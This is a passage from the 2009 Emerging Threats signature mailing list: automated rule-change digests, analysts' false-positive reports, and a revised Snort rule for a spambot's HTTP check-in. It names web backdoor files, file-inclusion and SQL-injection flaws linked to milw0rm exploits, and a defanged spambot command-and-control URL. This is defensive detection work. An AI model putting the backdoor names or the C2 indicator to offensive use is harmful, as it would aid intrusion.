 2407244 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (245) (emerging-rbn-BLOCK.rules)
 2407245 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (246) (emerging-rbn-BLOCK.rules)
 2407246 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (247) (emerging-rbn-BLOCK.rules)
 2407247 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (248) (emerging-rbn-BLOCK.rules)
 2407248 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (249) (emerging-rbn-BLOCK.rules)
 2407249 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (250) (emerging-rbn-BLOCK.rules)
 2407250 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (251) (emerging-rbn-BLOCK.rules)
 2407251 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (252) (emerging-rbn-BLOCK.rules)
 2407252 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (253) (emerging-rbn-BLOCK.rules)
 2407253 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (254) (emerging-rbn-BLOCK.rules)
 2407254 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (255) (emerging-rbn-BLOCK.rules)
 2407255 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (256) (emerging-rbn-BLOCK.rules)
 2407256 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (257) (emerging-rbn-BLOCK.rules)
 2407257 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (258) (emerging-rbn-BLOCK.rules)
 2407258 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (259) (emerging-rbn-BLOCK.rules)
 2407259 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (260) (emerging-rbn-BLOCK.rules)
 2407260 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (261) (emerging-rbn-BLOCK.rules)
 2407261 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (262) (emerging-rbn-BLOCK.rules)
 2407262 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (263) (emerging-rbn-BLOCK.rules)
 2407263 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (264) (emerging-rbn-BLOCK.rules)
 2407264 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (265) (emerging-rbn-BLOCK.rules)
 2407265 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (266) (emerging-rbn-BLOCK.rules)
 2407266 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (267) (emerging-rbn-BLOCK.rules)
 2407267 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (268) (emerging-rbn-BLOCK.rules)
 2407268 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (269) (emerging-rbn-BLOCK.rules)
 2407269 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (270) (emerging-rbn-BLOCK.rules)
 2407270 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (271) (emerging-rbn-BLOCK.rules)
 2407271 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (272) (emerging-rbn-BLOCK.rules)
 2407272 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (273) (emerging-rbn-BLOCK.rules)
 2407273 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (274) (emerging-rbn-BLOCK.rules)
 2407274 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (275) (emerging-rbn-BLOCK.rules)
 2407275 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (276) (emerging-rbn-BLOCK.rules)
 2407276 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (277) (emerging-rbn-BLOCK.rules)
 2407277 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (278) (emerging-rbn-BLOCK.rules)
 2407278 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (279) (emerging-rbn-BLOCK.rules)
 2407279 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (280) (emerging-rbn-BLOCK.rules)
 2407280 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (281) (emerging-rbn-BLOCK.rules)
 2407281 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (282) (emerging-rbn-BLOCK.rules)
 2407282 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (283) (emerging-rbn-BLOCK.rules)
 2407283 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (284) (emerging-rbn-BLOCK.rules)
 2407284 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (285) (emerging-rbn-BLOCK.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-rbn-BLOCK.rules (2):
        #  VERSION 128
        #  Updated 2009-05-07 11:32:09

     -> Added to emerging-rbn.rules (2):
        #  VERSION 128
        #  Updated 2009-05-07 11:32:09

     -> Added to emerging-sid-msg.map (45):
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (45):
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-web.rules (1):
        #by Jaime Blasco

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-rbn-BLOCK.rules (2):
        #  VERSION 127
        #  Updated 2009-04-29 09:08:59

     -> Removed from emerging-rbn.rules (2):
        #  VERSION 127
        #  Updated 2009-04-29 09:08:59


From sroddy at ligo-la.caltech.edu  Thu May  7 19:46:06 2009
From: sroddy at ligo-la.caltech.edu (Shannon Roddy)
Date: Thu, 07 May 2009 18:46:06 -0500
Subject: [Emerging-Sigs] FPs on 2002035
Message-ID: <4A0372BE.7000509@ligo-la.caltech.edu>

FP on the following rule will happen if you have a user of
culturecode.com's "Things" for mac or iphone.

User agent string that generated the FP:

User-Agent: Things/591 (Mac OS X) CCSparkle/1.0\r\n


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
Better Internet Spyware User Agent Activity (thin)"; flow:
to_server,established; content:"User-Agent\: thin"; nocase; classtype:
trojan-activity;
reference:url,doc.emergingthreats.net/bin/view/Main/2002035;
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents;
sid: 2002035; rev:21;)



Thanks,
Shannon

From jonkman at jonkmans.com  Fri May  8 09:11:09 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 08 May 2009 09:11:09 -0400
Subject: [Emerging-Sigs] FPs on 2002035
In-Reply-To: <4A0372BE.7000509@ligo-la.caltech.edu>
References: <4A0372BE.7000509@ligo-la.caltech.edu>
Message-ID: <4A042F6D.2060608@jonkmans.com>

Hmmm, thanks for the FP report.

I can drop the nocase on this one. The original malware used
"thininstall" and a few other variations. But I can't recall the alst
time we had a real hit on this. I suspect this malware has gone away or
morphed into something new.

Does anyone recall the last hit they had on this? I have 0 hits in the
sidreporter database, so none have been reported for at least 6 months.

I'm leaning toward dropping this rule. If it resurfaces we'll see it in
the sandnet and can bring the rules back.

Any objections?

Thanks Shannon

Matt

Shannon Roddy wrote:
> FP on the following rule will happen if you have a user of
> culturecode.com's "Things" for mac or iphone.
> 
> User agent string that generated the FP:
> 
> User-Agent: Things/591 (Mac OS X) CCSparkle/1.0\r\n
> 
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
> Better Internet Spyware User Agent Activity (thin)"; flow:
> to_server,established; content:"User-Agent\: thin"; nocase; classtype:
> trojan-activity;
> reference:url,doc.emergingthreats.net/bin/view/Main/2002035;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents;
> sid: 2002035; rev:21;)
> 
> 
> 
> Thanks,
> Shannon
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From pepperjack at afferentsecurity.com  Fri May  8 10:13:20 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Fri, 08 May 2009 09:13:20 -0500
Subject: [Emerging-Sigs] FPs on 2002035
In-Reply-To: <4A042F6D.2060608@jonkmans.com>
References: <4A0372BE.7000509@ligo-la.caltech.edu>
	<4A042F6D.2060608@jonkmans.com>
Message-ID: <20090508091320.jr6zm3lo0skw48kw@mail.afferentsecurity.com>

Quoting Matt Jonkman <jonkman at jonkmans.com>:

> Does anyone recall the last hit they had on this? I have 0 hits in the
> sidreporter database, so none have been reported for at least 6 months.

Checking my DB for 6 mos, I never got a hit on this one.  (appx 9000  
ip devices)

> Any objections?

none from me.

jp



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From emerging at emergingthreats.net  Fri May  8 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri,  8 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090508200011.079B34504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Fri May  8 16:00:10 2009 [***]

[///]     Modified active rules:     [///]

 2002035 - ET MALWARE Better Internet Spyware User Agent Activity (thin) (emerging-malware.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (2):
        2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (2):
        2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From phatbuckett at gmail.com  Fri May  8 16:22:40 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Fri, 8 May 2009 13:22:40 -0700
Subject: [Emerging-Sigs] Spambot detection on 2008189, mod
Message-ID: <839aec700905081322jecb8b06sc54cacdc89ba4252@mail.gmail.com>

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
SpamTool.Win32.Agent.gy Or Similar HTTP Checkin";
flow:established,to_server; uricontent:"alive.php?id="; nocase;
uricontent:"&tick="; nocase; uricontent:"&ver="; nocase;
uricontent:"&smtp="; nocase; classtype:trojan-activity;
reference:url,doc.emergingthreats.net/2008189;
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools;
sid:2008189; rev:2;)

Caught a report mentioning request as follows:

hxxp://91.207.4.138/spm/page.php?id=&tick=108484&ver=100&smtp=ok&task=0


...so relying on the script name breaks this. Alteration?:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
SpamTool.Win32.Agent.gy Or Similar HTTP Checkin";
flow:established,to_server; uricontent:"?id="; nocase;
uricontent:"&tick="; nocase; uricontent:"&ver="; nocase;
uricontent:"&smtp="; nocase; classtype:trojan-activity;
reference:url,doc.emergingthreats.net/2008189;
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools;
sid:2008189; rev:3;)

Above is probably still specific enough without worrying about the
maybe recently added 'tick' parameter...

-- 
Darren Spruell
phatbuckett at gmail.com

From phatbuckett at gmail.com  Fri May  8 18:49:18 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Fri, 8 May 2009 15:49:18 -0700
Subject: [Emerging-Sigs] Spambot detection on 2008189, mod
In-Reply-To: <839aec700905081322jecb8b06sc54cacdc89ba4252@mail.gmail.com>
References: <839aec700905081322jecb8b06sc54cacdc89ba4252@mail.gmail.com>
Message-ID: <839aec700905081549ob3d4b23h7e34742bec1dd502@mail.gmail.com>

On Fri, May 8, 2009 at 1:22 PM, Darren Spruell <phatbuckett at gmail.com> wrote:
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> SpamTool.Win32.Agent.gy Or Similar HTTP Checkin";
> flow:established,to_server; uricontent:"alive.php?id="; nocase;
> uricontent:"&tick="; nocase; uricontent:"&ver="; nocase;
> uricontent:"&smtp="; nocase; classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/2008189;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools;
> sid:2008189; rev:2;)
>
> Caught a report mentioning request as follows:
>
> hxxp://91.207.4.138/spm/page.php?id=&tick=108484&ver=100&smtp=ok&task=0
>
>
> ...so relying on the script name breaks this. Alteration?:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> SpamTool.Win32.Agent.gy Or Similar HTTP Checkin";
> flow:established,to_server; uricontent:"?id="; nocase;
> uricontent:"&tick="; nocase; uricontent:"&ver="; nocase;
> uricontent:"&smtp="; nocase; classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/2008189;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools;
> sid:2008189; rev:3;)
>
> Above is probably still specific enough without worrying about the
> maybe recently added 'tick' parameter...

Might also be worth noting the common name in the message, "Grum"
(also Tedroo).

http://securitylabs.websense.com/content/Blogs/2721.aspx
http://www.secureworks.com/research/threats/botnets2009/

-- 
Darren Spruell
phatbuckett at gmail.com

From emerging at emergingthreats.net  Sat May  9 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat,  9 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090509200010.A0AA14504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat May  9 16:00:10 2009 [***]

[*] Rules modifications: [*]
    None.

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (6):
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (6):
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From emerging at emergingthreats.net  Sat May  9 18:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat,  9 May 2009 18:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
